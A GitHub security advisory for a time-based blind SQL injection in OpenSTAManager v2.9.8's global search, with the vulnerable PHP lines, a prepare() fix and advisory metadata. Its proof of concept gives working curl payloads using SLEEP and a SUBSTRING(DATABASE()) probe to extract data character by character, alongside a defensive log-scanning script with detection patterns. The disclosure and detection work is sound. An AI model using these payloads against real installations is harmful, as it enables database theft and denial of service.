GHSA-4HC4-8599-XH2H

Vulnerability from github – Published: 2026-02-06 18:23 – Updated: 2026-02-06 18:23
Summary
OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service
Details

Summary

Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with amplified execution across 10+ modules.

Status: ✅ Confirmed and tested on live instance (v2.9.8)
Vulnerable Parameter: term (GET)
Affected Endpoint: /ajax_search.php
Affected Modules: Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi

Details

OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.

Vulnerability Chain:

  1. Entry Point: /ajax_search.php (Line 30-31)

     $term = get('term');
     $term = str_replace('/', '\\/', $term);

     The $term parameter undergoes minimal sanitization (only forward slash replacement).

  2. Distribution: /src/AJAX.php::search() (Line 159-161)

     $files = self::find('ajax/search.php');
     array_unshift($files, base_dir().'/ajax_search.php');
     foreach ($files as $file) {
         $module_results = self::getSearchResults($file, $term);

     The unsanitized $term is passed to all module-specific search handlers.

  3. Execution: /src/AJAX.php::getSearchResults() (Line 373)

     require $file;

     Each module's search.php file is included with the $term variable in scope.

  4. Vulnerable SQL Queries: Multiple modules directly concatenate $term without prepare().

All Affected Files (10+ vulnerable instances):

  1. /modules/articoli/ajax/search.php - Line 51 (PRIMARY EXAMPLE)

     foreach ($fields as $name => $value) {
         $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
     }
     $rs = $dbo->fetchArray($query);

     Impact: Direct concatenation without prepare() allows full SQL injection.

  2. /modules/ordini/ajax/search.php - Lines 43, 47

     $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
     $query .= '... WHERE `mg_articoli`.`codice` LIKE "%'.$term.'%" OR `mg_articoli_lang`.`title` LIKE "%'.$term.'%"';

  3. /modules/ddt/ajax/search.php - Lines 43, 47

     $query .= ' OR '.$value.' LIKE "%'.$term.'%"';

  4. /modules/fatture/ajax/search.php - Lines 45, 49

     $query .= ' OR '.$value.' LIKE "%'.$term.'%"';

  5. /modules/preventivi/ajax/search.php - Lines 45, 49

     $query .= ' OR '.$value.' LIKE "%'.$term.'%"';

  6. /modules/anagrafiche/ajax/search.php - Lines 62, 107, 162

     $query .= ' OR '.$value.' LIKE "%'.$term.'%"';

  7. /modules/impianti/ajax/search.php - Line 46

     $query .= ' OR '.$value.' LIKE "%'.$term.'%"';

Properly Sanitized (NOT vulnerable):

  • /modules/contratti/ajax/search.php - Uses prepare() correctly
  • /modules/automezzi/ajax/search.php - Uses prepare() correctly

Note: The vulnerability has amplified execution - a single malicious request triggers SQL Injection across ALL vulnerable modules simultaneously, causing time-based attacks to execute 10+ times per request, multiplying the delay and leading to 504 Gateway Time-out errors as observed on the live demo instance.


PoC

Step 1: Login

curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Step 2: Verify Vulnerability (Time-Based SLEEP)

# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22'
# Result: real 72.29s

# Test with SLEEP(0) - should be fast
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22'
# Result: real 0.30s


Step 3: Data Extraction - Database Name

# Extract first character of database name (expected: 'o' from 'openstamanager')
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 170.32s

# Test with wrong character 'x' - should be fast
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 0m0.30s
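Defender-side counterpart to the PoC above: a small access-log triage script (added example, not part of the advisory or of OpenSTAManager) that decodes the term parameter of requests to /ajax_search.php and flags the two signatures the advisory describes, time-delay primitives inside a double-quote breakout, and the amplified response time or 504 that results. The log lines are constructed; the log format (combined format with the request time in seconds as a trailing field) and the 5 s slow threshold are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not from the advisory): combined log format with the
# request time in seconds appended as a trailing field, e.g. nginx "$request_time".
SAMPLE_LOG = """\
10.0.0.5 - - [06/Feb/2026:18:20:01 +0000] "GET /ajax_search.php?term=fattura HTTP/1.1" 200 812 0.31
10.0.0.9 - - [06/Feb/2026:18:20:07 +0000] "GET /ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22 HTTP/1.1" 200 812 72.29
10.0.0.9 - - [06/Feb/2026:18:22:10 +0000] "GET /ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221 HTTP/1.1" 504 0 170.32
10.0.0.5 - - [06/Feb/2026:18:23:00 +0000] "GET /index.php?op=login HTTP/1.1" 200 1024 0.05
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ (?P<secs>[\d.]+)$'
)
# MySQL/MariaDB time-delay primitives; the advisory's PoC relies on SLEEP().
TIMING_RE = re.compile(r'\b(SLEEP|BENCHMARK)\s*\(', re.IGNORECASE)
# The vulnerable code wraps $term in double quotes, so breaking out needs a literal ".
BREAKOUT_RE = re.compile(r'"\s*(AND|OR)\b', re.IGNORECASE)
SLOW_SECONDS = 5.0  # assumed threshold; a normal search above completes in well under 1 s

def analyze_line(line):
    """Return findings for one request to /ajax_search.php, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != "/ajax_search.php":
        return None
    term = parse_qs(url.query).get("term", [""])[0]  # parse_qs percent-decodes the value
    reasons = []
    if TIMING_RE.search(term):
        reasons.append("timing-primitive")
    if BREAKOUT_RE.search(term):
        reasons.append("quote-breakout")
    secs = float(m.group("secs"))
    if secs >= SLOW_SECONDS or m.group("status") == "504":
        reasons.append("slow-or-timeout")  # amplified delay / gateway timeout signature
    if not reasons:
        return None
    return {"ip": m.group("ip"), "status": m.group("status"), "seconds": secs,
            "term": term, "reasons": reasons}

def scan(log_text):
    """Run analyze_line over every line and keep only the suspicious requests."""
    return [f for f in map(analyze_line, log_text.splitlines()) if f]
```

Because the same injected term is executed by every vulnerable module, the response-time signal is unusually strong here: a single search request that takes tens of seconds or ends in a 504 is worth alerting on even before the term itself is inspected.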


Impact

Affected Users: All authenticated users with access to the global search functionality.

  • Complete database exfiltration including customer PII, financial records, business secrets
  • Extraction of password hashes for offline cracking
  • Amplified time-based attacks consume 85x server resources per request

Recommended Fix:

Replace all instances of direct $term concatenation with prepare():

BEFORE (Vulnerable):

$query .= ' OR '.$value.' LIKE "%'.$term.'%"';

AFTER (Fixed):

$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');

Apply this fix to ALL affected files:

  1. /modules/articoli/ajax/search.php - Line 51
  2. /modules/ordini/ajax/search.php - Lines 43, 47, 79
  3. /modules/ddt/ajax/search.php - Lines 43, 47, 83
  4. /modules/fatture/ajax/search.php - Lines 45, 49, 85
  5. /modules/preventivi/ajax/search.php - Lines 45, 49, 83
  6. /modules/anagrafiche/ajax/search.php - Lines 62, 107, 162
  7. /modules/impianti/ajax/search.php - Line 46


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 2.9.8"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "devcode-it/openstamanager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24417"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-06T18:23:14Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "id": "GHSA-4hc4-8599-xh2h",
  "modified": "2026-02-06T18:23:14Z",
  "published": "2026-02-06T18:23:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4hc4-8599-xh2h"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/devcode-it/openstamanager"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service"
}